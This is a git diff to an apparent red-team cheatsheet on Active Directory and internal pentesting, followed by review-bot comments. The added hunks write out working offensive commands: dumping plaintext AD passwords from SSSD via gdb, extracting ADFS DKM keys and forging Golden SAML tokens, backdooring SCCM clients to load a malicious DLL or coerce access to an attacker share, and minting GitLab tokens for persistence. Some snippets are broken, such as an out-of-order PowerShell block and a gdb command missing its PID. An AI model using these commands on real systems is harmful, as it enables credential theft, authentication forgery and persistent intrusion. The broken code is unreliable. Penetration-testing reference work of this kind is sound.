diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md index 02091ac..ce85c4d 100644 --- a/docs/active-directory/ad-adds-enumerate.md +++ b/docs/active-directory/ad-adds-enumerate.md @@ -303,6 +303,27 @@ You can remotely query every machines on the network to get a list of the users' ``` +## RID cycling + +Enumerate users from the Domain Controllers. + +* Using `netexec` + ```ps1 + netexec smb 10.10.11.231 -u guest -p '' --rid-brute + SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False) + SMB 10.10.11.231 445 DC01 [+] rebound.htb\guest: + SMB 10.10.11.231 445 DC01 498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup) + SMB 10.10.11.231 445 DC01 500: rebound\Administrator (SidTypeUser) + SMB 10.10.11.231 445 DC01 501: rebound\Guest (SidTypeUser) + SMB 10.10.11.231 445 DC01 502: rebound\krbtgt (SidTypeUser) + ``` + +* Using Impacket script [lookupsid.py](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py) + ```ps1 + lookupsid.py -no-pass 'guest@rebound.htb' 20000 + ``` + + ## Other Interesting Commands - **Find Domain Controllers** diff --git a/docs/active-directory/ad-adds-linux.md b/docs/active-directory/ad-adds-linux.md index 9dae044..20b2d3b 100644 --- a/docs/active-directory/ad-adds-linux.md +++ b/docs/active-directory/ad-adds-linux.md @@ -40,7 +40,7 @@ make CONF=Release ## CCACHE ticket reuse from SSSD KCM -SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. +System Security Services Daemon (SSSD) maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`. By default, the key is only readable if you have **root** permissions. 
@@ -130,7 +130,53 @@ De-obfuscate the content of the ldap_default_authtok variable with [mludvig/sss_ ``` +## Extract accounts from SSSD keyring + +**Requirements**: + +* `krb5_store_password_if_offline = True` in `/etc/sssd/sssd.conf` + +**Exploit**: + +When `krb5_store_password_if_offline` is enabled, the AD password is stored plaintext. + +```ps1 +[domain/domain.local] +cache_credentials = True +ipa_domain = domain.local +id_provider = ipa +auth_provider = ipa +access_provider = ipa +chpass_provider = ipa +ipa_server = _srv_, server.domain.local +krb5_store_password_if_offline = true +``` + + +Grab the PID of the SSSD process and hook it in `gdb`. Then list the process keyrings. + +```ps1 +gdb -p +call system("keyctl show > /tmp/output") +``` + +From the `/tmp/output` locate the `key_id` for the user you want. + +```ps1 +Session Keyring + 237034099 --alswrv 0 0 keyring: _ses + 689325199 --alswrv 0 0 \_ user: user@domain.local +``` + +Back to GDB: + +```ps1 +call system("keyctl print 689325199 > /tmp/output") +``` + + ## References * [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html) -* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) \ No newline at end of file +* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) +* [20.4. Caching Kerberos Passwords - Red Hat Customer Portal](https://access.redhat.com/documentation/fr-fr/red_hat_enterprise_linux/6/html/identity_management_guide/kerberos-pwd-cache) \ No newline at end of file diff --git a/docs/active-directory/ad-adfs-federation-services.md b/docs/active-directory/ad-adfs-federation-services.md index 2666a3a..1f7b178 100644 
--- a/docs/active-directory/ad-adfs-federation-services.md +++ b/docs/active-directory/ad-adfs-federation-services.md @@ -1,7 +1,37 @@ # Active Directory - Federation Services +Active Directory Federation Services (AD FS) is a software component developed by Microsoft that provides users with single sign-on (SSO) access to systems and applications located across organizational boundaries. It uses a claims-based access control authorization model to maintain application security and to provide seamless access to web-based applications that are hosted inside or outside the corporate network. + + +## ADFS - DKM Master Key + +* The DKM key is stored in the `thumbnailPhoto` attribute of the AD contact object. + +```ps1 +$key=(Get-ADObject -filter 'ObjectClass -eq "Contact" -and name -ne "CryptoPolicy"' -SearchBase "CN=ADFS,CN=Microsoft,CN=Program Data,DC=domain,DC=local" -Properties thumbnailPhoto).thumbnailPhoto +[System.BitConverter]::ToString($key) +``` + + +## ADFS - Trust Relationship + +Gets the relying party trusts of the Federation Service. + +* Search for `IssuanceAuthorizationRules` + ```ps1 + Get-AdfsRelyingPartyTrust + ``` + + ## ADFS - Golden SAML +Golden SAML is a type of attack where an attacker creates a forged SAML (Security Assertion Markup Language) authentication response to impersonate a legitimate user and gain unauthorized access to a service provider. This attack leverages the trust established between the identity provider (IdP) and service provider (SP) in a SAML-based single sign-on (SSO) system. + +* Golden SAML are effective even when 2FA is enabled. +* The token-signing private key is not renewed automatically +* Changing a user’s password won't affect the generated SAML + + **Requirements**: * ADFS service account 
@@ -9,7 +39,7 @@ **Exploitation**: -* Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on AD FS server as the AD FS service account. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query` +* Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on ADFS server as the **ADFS service account**. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query` * Convert PFX and Private Key to binary format ```ps1 # For the pfx @@ -17,6 +47,7 @@ # For the private key echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin ``` + * Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof), you might need to update the [dependencies](https://github.com/szymex73/ADFSpoof). ```ps1 mkdir ADFSpoofTools 
@@ -36,11 +67,64 @@ /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions 'PENTEST\administrator' ``` + +**Manual Exploitation**: + +* Retrieve the WID path: `Get-AdfsProperties` +* Retrieve the ADFS Relying Party Trusts: `Get-AdfsRelyingPartyTrust` +* Retrieve the signing certificate, save the `EncryptedPfx` and decode it `base64 -d adfs.b64 > adfs.bin` + ```powershell + $cmd.CommandText = "SELECT ServiceSettingsData from AdfsConfigurationV3.IdentityServerPolicy.ServiceSettings" + $client= New-Object System.Data.SQLClient.SQLConnection($ConnectionString); + $client.Open(); + $cmd = $client.CreateCommand() + $cmd.CommandText = "SELECT name FROM sys.databases" + $reader = $cmd.ExecuteReader() + $reader.Read() | Out-Null + $name = $reader.GetString(0) + $reader.Close() + Write-Output $name; + ``` +* Retrieve the DKM key stored inside the `thumbnailPhoto` attribute of the Active Directory: + ```ps1 + ldapsearch -x -H ldap://DC.domain.local -b "CN=ADFS,CN=Microsoft,CN=Program Data,DC=DOMAIN,DC=LOCAL" -D "adfs-svc-account@domain.local" -W -s sub "(&(objectClass=contact)(!(name=CryptoPolicy)))" thumbnailPhoto + ``` +* Convert the retrieved key to raw format: `echo "RETRIEVED_KEY_HERE" | base64 -d > adfs.key` +* Use [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof) to generate the Golden SAML + +NOTE: There might be multiple master keys in the container, remember to try them all. 
+ + +**Golden SAML Examples** + +* SAML2: requires `--endpoint`, `--nameidformat`, `--identifier`, `--nameid` and `--assertions` + ```ps1 + python ADFSpoof.py -b adfs.bin adfs.key -s adfs.domain.local saml2 --endpoint https://www.contoso.com/adfs/ls + /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions 'PENTEST\administrator' + ``` + +* Office365: requires `--upn` and `--objectguid` + ```ps1 + python3 ADFSpoof.py -b adfs.bin adfs.key -s sts.domain.local o365 --upn user@domain.local --objectguid 712D7BFAE0EB79842D878B8EEEE239D1 + ``` + +* Other: connect to the service provider using a known account, analyze the SAML token attributes given and reuse their format. + +**NOTE**: Sync the time between the attacker's machine generating the Golden SAML and the ADFS server. + + Other interesting tools to exploit AD FS: * [secureworks/whiskeysamlandfriends/WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) - Proof of concept for a Golden SAML attack with Remote ADFS Configuration Extraction. 
- +* [cyberark/shimit](https://github.com/cyberark/shimit) - A tool that implements the Golden SAML attack + ```ps1 + python ./shimit.py -idp http://adfs.domain.local/adfs/services/trust -pk key -c cert.pem -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id REDACTED + ``` ## References -* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) \ No newline at end of file +* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) +* [Active Directory Federation Services (ADFS) Distributed Key Manager (DKM) Keys - Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/adfs_dkm_keys.html) +* [Exploring the Golden SAML Attack Against ADFS - 7 December 2021](https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs) +* [Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps - Shaked Reiner - 11/21/17](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps) +* [Meet Silver SAML: Golden SAML in the Cloud - Tomer Nahum and Eric Woodruff - Feb 29, 2024](https://www.semperis.com/blog/meet-silver-saml/) \ No newline at end of file diff --git a/docs/active-directory/deployment-sccm.md b/docs/active-directory/deployment-sccm.md index 2b00a8c..9b0abf7 100644 --- a/docs/active-directory/deployment-sccm.md +++ b/docs/active-directory/deployment-sccm.md 
@@ -1,12 +1,11 @@ # Deployment - SCCM -## Application Deployment +## SCCM Application Deployment > SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation. -* [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM) -* [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM) - +* [PowerShellMafia/PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM) +* [nettitude/MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM) * Using **SharpSCCM** ```ps1 @@ -75,7 +74,10 @@ ``` -## Configuration Manager +## SCCM Configuration Manager + +* [subat0mik/Misconfiguration-Manager/MisconfigurationManager.ps1](https://raw.githubusercontent.com/subat0mik/Misconfiguration-Manager/main/MisconfigurationManager.ps1) + ### CRED-1 Retrieve credentials via PXE boot media 
@@ -214,6 +216,25 @@ From a remote machine. ``` +## SCCM Persistence + +* [mandiant/CcmPwn](https://github.com/mandiant/CcmPwn) - lateral movement script that leverages the CcmExec service to remotely hijack user sessions. + +CcmExec is a service native to SCCM Windows clients that is executed on every interactive session. This technique requires Adminsitrator privileges on the targeted machine. + +* Backdoor the `SCNotification.exe.config` to load your DLL + + ```ps1 + python3 ccmpwn.py domain/user:password@workstation.domain.local exec -dll evil.dll -config exploit.config + ``` + +* Malicious config to force `SCNotification.exe` to load a file from an attacker-controlled file share + + ```ps1 + python3 ccmpwn.py domain/user:password@workstation.domain.local coerce -computer 10.10.10.10 + ``` + + ## References * [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/) 
@@ -222,4 +243,9 @@ From a remote machine. * [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html) * [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/) * [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867) -* [Misconfiguration Manager: Overlooked and Overprivileged - Duane Michael - Mar 5, 2024](https://posts.specterops.io/misconfiguration-manager-overlooked-and-overprivileged-70983b8f350d) \ No newline at end of file +* [Misconfiguration Manager: Overlooked and Overprivileged - Duane Michael - Mar 5, 2024](https://posts.specterops.io/misconfiguration-manager-overlooked-and-overprivileged-70983b8f350d) +* [SeeSeeYouExec: Windows Session Hijacking via CcmExec - Andrew Oliveau](https://cloud.google.com/blog/topics/threat-intelligence/windows-session-hijacking-via-ccmexec?hl=en) +* [SCCM / MECM LAB - Part 0x0 - mayfly - Mar 23, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x0/) +* [SCCM / MECM LAB - Part 0x1 - Recon and PXE - mayfly - Mar 28, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x1/) +* [SCCM / MECM LAB - Part 0x2 - Low user - mayfly - Mar 28, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x2/) +* [SCCM / MECM LAB - Part 0x3 - Admin User - mayfly - Apr 3, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x3/) \ No newline at end of file diff --git a/docs/cheatsheets/escape-breakout.md b/docs/cheatsheets/escape-breakout.md index 269801a..0dd3651 100644 --- a/docs/cheatsheets/escape-breakout.md +++ b/docs/cheatsheets/escape-breakout.md 
@@ -1,7 +1,8 @@ -# Application Escape and Breakout +# Kiosk Escape and Jail Breakout ## Summary +* [Methodology](#methodology) * [Gaining a command shell](#gaining-a-command-shell) * [Sticky Keys](#sticky-keys) * [Dialog Boxes](#dialog-boxes) @@ -21,6 +22,19 @@ * [kiosk.vsim.xyz](https://kiosk.vsim.xyz/) - tooling for browser-based, Kiosk mode testing. +## Methodology + +- Display global variables and their permissions: `export -p` +- Switch to another user using `sudo`/`su` +- Basic privilege escalations such as CVE, sudo misconfiguration, etc. Comprehensive list at [Linux](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/) / [Windows](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/) +- List default commands in the restricted shell: `compgen -c` +- Container escape if it's running inside a `Docker`/`LXC` container +- Pivot onto the network + - Scan other machines on the network or attempt SSRF exploitation + - Metadata for Cloud assets, see `cloud/aws` and `cloud/azure` +- Use globbing capability built inside the shell: `echo *`, `echo .*`, `echo /*` + + ## Gaining a command shell * **Shortcut** @@ -106,6 +120,7 @@ Enter *.* or *.exe or similar in `File name` box * Print menus * All other menus that provide dialog boxes + ### Accessing filesystem Enter these paths in the address bar: @@ -115,6 +130,7 @@ Enter these paths in the address bar: * %HOMEDRIVE% * \\127.0.0.1\c$\Windows\System32 + ### Unassociated Protocols It is possible to escape a browser based kiosk with other protocols than usual `http` or `https`. 
@@ -143,6 +159,14 @@ firefox irc://127.0.0.1 -P "Test" ## Shell URI Handlers +A URI (Uniform Resource Identifier) handler is a software component that enables a web browser or operating system to pass a URI to an appropriate application for further handling. + +For example, when you click on a "mailto:" link in a webpage, your device knows to open your default email application. This is because the "mailto:" URI scheme is registered to be handled by an email application. Similarly, "http:" and "https:" URIs are typically handled by a web browser. + +In essence, URI handlers provide a bridge between web content and desktop applications, allowing for a seamless user experience when navigating between different types of resources. + +The following URI handlers might trigger application on the machine: + * shell:DocumentsLibrary * shell:Librariesshell:UserProfiles * shell:Personal diff --git a/docs/cheatsheets/source-code-management-ci.md b/docs/cheatsheets/source-code-management-ci.md index 6a450b0..c6ceaec 100644 --- a/docs/cheatsheets/source-code-management-ci.md +++ b/docs/cheatsheets/source-code-management-ci.md @@ -1,14 +1,6 @@ # Source Code Management & CI/CD Compromise -> - -## Summary - -* [Tools](#tools) -* [Enumerate repositories files and secrets](#enumerate-repositories-files-and-secrets) -* [Personal Access Token](#personal-access-token) -* [Gitlab CI/Github Actions](#gitlab-cigithub-actions) -* [References](#references) +> CI/CD is a method to frequently deliver apps to customers by introducing automation into the stages of app development. The main concepts attributed to CI/CD are continuous integration, continuous delivery, and continuous deployment. Compromises in CI/CD can occur through unauthorized access, misconfiguration, dependency vulnerabilities, insecure secrets, and lack of visibility. ## Tools 
@@ -51,17 +43,24 @@ Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforce SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local ``` -* Get the assigned privileges to an access token being used in a particular SCM system - ```ps1 - SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local - ``` * Promote a normal user to an administrative role in a particular SCM system ```ps1 SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName SCMKit.exe -s gitlab -m removeadmin -c userName:password -u https://gitlab.something.local -o targetUserName ``` -* Create/List/Delete an access token to be used in a particular SCM system + + +## Personal Access Token + +Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance. + +* Manual + ```ps1 + curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens" + ``` + +* Using `SCMKit.exe`: Create/List/Delete an access token to be used in a particular SCM system ```ps1 SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName 
@@ -69,6 +68,14 @@ Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforce SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser ``` +* Get the assigned privileges to an access token being used in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local + ``` + + +## SSH Keys + * Create/List an SSH key to be used in a particular SCM system ```ps1 SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key" @@ -79,15 +86,8 @@ Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforce SCMKit.exe -s gitlab -m removesshkey -c apiToken -u https://gitlab.something.local -o sshKeyID ``` -## Personal Access Token -Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance. - -```ps1 -curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens" -``` - -## Gitlab CI/Github Actions +## Gitlab CI * Gitlab-CI "Command Execution" example: `.gitlab-ci.yml` ```yaml 
@@ -107,6 +107,22 @@ curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-pers tags: - ${RUNNER} ``` + + +### Gitlab Executors + +* **Shell** executor: The jobs are run with the permissions of the GitLab Runner’s user and can steal code from other projects that are run on this server. +* **Docker** executor: Docker can be considered safe when running in non-privileged mode. +* **SSH** executor: SSH executors are susceptible to MITM attack (man-in-the-middle), because of missing `StrictHostKeyChecking` option. + + +### Gitlab CI/CD variables + +CI/CD Variables are a convenient way to store and use data in a CI/CD pipeline, but variables are less secure than secrets management providers + + +## Github Actions + * Github Action "Command Execution" example: `.github/workflows/example.yml` ```yml name: example @@ -127,7 +143,10 @@ curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-pers whoami ``` + ## References * [Controlling the Source: Abusing Source Code Management Systems - Brett Hawkins - August 9, 2022](https://securityintelligence.com/posts/abusing-source-code-management-systems/) -* [CI/CD SECRETS EXTRACTION, TIPS AND TRICKS - Hugo Vincent, Théo Louis-Tisserand - 01/03/2023](https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks.html) \ No newline at end of file +* [CI/CD SECRETS EXTRACTION, TIPS AND TRICKS - Hugo Vincent, Théo Louis-Tisserand - 01/03/2023](https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks.html) +* [Security for self-managed runners - Gitlab](https://docs.gitlab.com/runner/security/) +* [Fixing Typos and Breaching Microsoft’s Perimeter - John Stawinski IV - April 15, 2024](https://johnstawinski.com/2024/04/15/fixing-typos-and-breaching-microsofts-perimeter/) \ No newline at end of file diff --git a/docs/redteam/access/windows-using-credentials.md b/docs/redteam/access/windows-using-credentials.md index 2e40385..2e73887 100644 
--- a/docs/redteam/access/windows-using-credentials.md +++ b/docs/redteam/access/windows-using-credentials.md @@ -344,12 +344,18 @@ PS C:\> wmic /node:target.domain /user:domain\user /password:password process ca ## SSH Protocol -:warning: You cannot pass the hash to SSH, but you can connect with a Kerberos ticket (Which you can get by passing the hash!) +:warning: You cannot pass the hash to SSH -```ps1 -cp user.ccache /tmp/krb5cc_1045 -ssh -o GSSAPIAuthentication=yes user@domain.local -vv -``` +* Connect using username/password of a Domain User + ```ps1 + ssh -l user@domain 192.168.1.1 + ``` + +* Connect with a Kerberos ticket + ```ps1 + cp user.ccache /tmp/krb5cc_1045 + ssh -o GSSAPIAuthentication=yes user@domain.local -vv + ``` ## Other methods diff --git a/mkdocs.yml b/mkdocs.yml index 61d4235..b1cf22b 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -2,8 +2,13 @@ site_name: Internal All The Things site_description: 'Active Directory and Internal Pentest Cheatsheets' site_url: https://swisskyrepo.github.io/InternalAllTheThings +repo_url: https://github.com/swisskyrepo/InternalAllTheThings +edit_uri: blob/main/docs/ + theme: name: material + color_mode: auto + user_color_mode_toggle: true icon: repo: fontawesome/brands/github palette: @@ -23,8 +28,13 @@ theme: features: - content.code.copy + - content.action.edit + - content.action.view + - content.tooltips - navigation.tracking - navigation.top + - search.share + - search.suggest extra_css: - custom.css @@ -46,8 +56,6 @@ markdown_extensions: emoji_index: !!python/name:material.extensions.emoji.twemoji emoji_generator: !!python/name:material.extensions.emoji.to_svg -repo_url: https://github.com/swisskyrepo/InternalAllTheThings/ -edit_uri: edit/master/ plugins: - search - git-revision-date-localized
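Review bot: in the `ad-adds-enumerate.md` RID cycling hunk, both fenced blocks are tagged `ps1` but contain Linux shell commands (`netexec`, `lookupsid.py`); tag them `bash` so they render and copy as a shell session. The `lookupsid.py -no-pass 'guest@rebound.htb' 20000` line passes a bare `20000` with no explanation; say that it is the upper bound of the RID range to cycle through, otherwise readers will not know why the default was raised. The sample output also shows the whole walkthrough succeeding as `guest` with an empty password (`[+] rebound.htb\guest:`), which is the precondition that belongs under the heading: state that the enumeration relies on the Guest account being enabled, since disabling it is the first thing a reader on the defensive side will look for.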
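Review bot: in the `ad-adds-linux.md` "Extract accounts from SSSD keyring" hunk, `gdb -p` is missing its PID argument (the placeholder was most likely stripped as an HTML tag) and will not run as written; write it as `gdb -p $(pidof sssd)` or `gdb -p PID`. The Requirements list should also mention root, since attaching gdb to the `sssd` process needs it. The sample config contradicts the prose: the text says "the AD password is stored plaintext" but the block is an IPA domain (`id_provider = ipa`, `ipa_server = ...`), so either show an `id_provider = ad` block or say the behaviour applies to both providers. "Stored plaintext" should also say where: the `keyctl show` output shows it lives in the process session keyring (`user: user@domain.local`), not on disk. The requirement says `= True` while the config says `= true`; pick one. All four fences are tagged `ps1` for bash, gdb and keyctl content.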
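Review bot: in the `ad-adfs-federation-services.md` intro hunk, "Golden SAML are effective even when 2FA is enabled" should read "Golden SAML attacks remain effective even when 2FA is enabled", and the next two bullets lack terminal punctuation. The "ADFS - Trust Relationship" section pastes the cmdlet help text ("Gets the relying party trusts of the Federation Service.") without saying why the reader is looking at `IssuanceAuthorizationRules` or the relying party identifier (the value later passed as `--rpidentifier`); one sentence tying it to the Golden SAML steps would make the section self-explanatory. In the DKM block, `DC=domain,DC=local` should be called out as a placeholder to replace.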
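Review bot: the `-9,7 +39,7` hunk renames "AD FS" to "ADFS" while the new intro paragraph added to the same file uses "AD FS"; pick one spelling for the whole page.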
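Review bot: in the "Manual Exploitation" hunk of `ad-adfs-federation-services.md`, the PowerShell block is out of order and does not do what its bullet says: `$cmd.CommandText = "SELECT ServiceSettingsData ..."` is assigned before `$cmd` exists (`$cmd = $client.CreateCommand()` comes three lines later), it is then overwritten by `SELECT name FROM sys.databases`, and `$ConnectionString` is never defined although the first bullet ("Retrieve the WID path: `Get-AdfsProperties`") implies it comes from there. Open the connection first, keep the `ServiceSettingsData` query, and say that `EncryptedPfx` is an element inside the returned XML rather than a column. In "Golden SAML Examples" the SAML2 requirement list says `--identifier` but the command uses `--rpidentifier`, and that saml2 command is a verbatim copy of the one already shown in the context lines just above; keep one copy. The `ldapsearch`, `base64` and `python` lines are bash, not `ps1`.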
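Review bot: in the `deployment-sccm.md` "SCCM Configuration Manager" hunk, the new bullet is a bare link to a raw `MisconfigurationManager.ps1` with no description, unlike every other tool entry in the file (`[owner/name - what it does](url)`); add a one-line description and link the repository rather than the raw script so readers can review the code before running it.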
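Review bot: in the "SCCM Persistence" hunk, "Adminsitrator" is a typo. The section is titled Persistence, but the tool is introduced as a "lateral movement script" that "hijacks user sessions"; align the heading with the sentence or vice versa. "CcmExec is a service ... that is executed on every interactive session" conflates the service with the process the two bullets actually target (`SCNotification.exe.config`, `SCNotification.exe`); say that the CcmExec service launches SCNotification.exe in each interactive session. The second bullet mentions "an attacker-controlled file share" but the command only takes `-computer 10.10.10.10`, so state which host that argument is. Both fences hold python commands and should not be tagged `ps1`.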
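Review bot: in the `escape-breakout.md` "Methodology" hunk, `export -p` lists exported environment variables, not "global variables and their permissions"; reword. "Basic privilege escalations such as CVE, sudo misconfiguration, etc." reads awkwardly ("known CVEs, sudo misconfiguration, ..."). "Metadata for Cloud assets, see `cloud/aws` and `cloud/azure`" references paths where the Linux/Windows item in the same list uses full links; do the same here. The list uses `-` bullets while the Summary above it uses `*`.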
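Review bot: in the "Shell URI Handlers" hunk, "might trigger application on the machine" should be "might launch an application on the machine". While this list is being touched, the context line `shell:Librariesshell:UserProfiles` directly below is two entries fused into one (`shell:Libraries` and `shell:UserProfiles`) and is worth splitting in the same PR.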
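Review bot: the first `source-code-management-ci.md` hunk deletes the whole "Summary" table of contents while `escape-breakout.md` in the same PR extends its Summary; if the site navigation now covers this, fine, otherwise keep the list and update it for the new "SSH Keys", "Gitlab CI" and "Github Actions" headings added further down.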
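Review bot: in the "Personal Access Token" hunk, the `curl` example never says what the `PRIVATE-TOKEN` must be allowed to do; `/api/v4/users/UserIDNumber/personal_access_tokens` creates a token on behalf of another user, so state the required privilege (on GitLab this route is administrator-only), which is also what makes the call a high-signal event to audit. `expires_at=` is sent empty; say what that yields. `-k` disables TLS verification and should be explained or dropped from a copy-paste example.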
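Review bot: in the "Gitlab Executors" hunk, the bullets mix risk statements with implied mitigations without saying which is which; the Docker bullet ("can be considered safe when running in non-privileged mode") reads better as "safe unless the runner is configured as privileged", and the SSH bullet should say that the missing `StrictHostKeyChecking` option is the thing to enable, both of which the GitLab runner security page added to References supports. The "Gitlab CI/CD variables" section is one sentence with no terminal period and nothing actionable; either say what to check (which variable settings leave values readable from a job) or drop it.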
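Review bot: in the `windows-using-credentials.md` SSH hunk, the rewrite drops the pointer that the Kerberos ticket can itself be obtained from the hash ("Which you can get by passing the hash!"); keep that sentence in the "Connect with a Kerberos ticket" bullet so the two bullets still explain why the warning is not a dead end. `cp user.ccache /tmp/krb5cc_1045` hard-codes a UID; say it must match the caller's UID or point `KRB5CCNAME` at the file so the example works for anyone. Both fences are `ps1` for Linux commands.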
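Review bot: in the first `mkdocs.yml` hunk, `color_mode: auto` and `user_color_mode_toggle: true` are options of MkDocs' built-in themes, not of `material`, which handles light/dark through the `palette:` block already present a few lines below; they will simply be ignored, so drop them. `edit_uri: blob/main/docs/` combined with the `content.action.edit` feature makes the edit button open the file viewer rather than the editor; use `edit/main/docs/`. The value removed lower in the file already used `edit/` but pointed at `master`, so the branch rename looks like the real change and should not lose the `edit/` prefix.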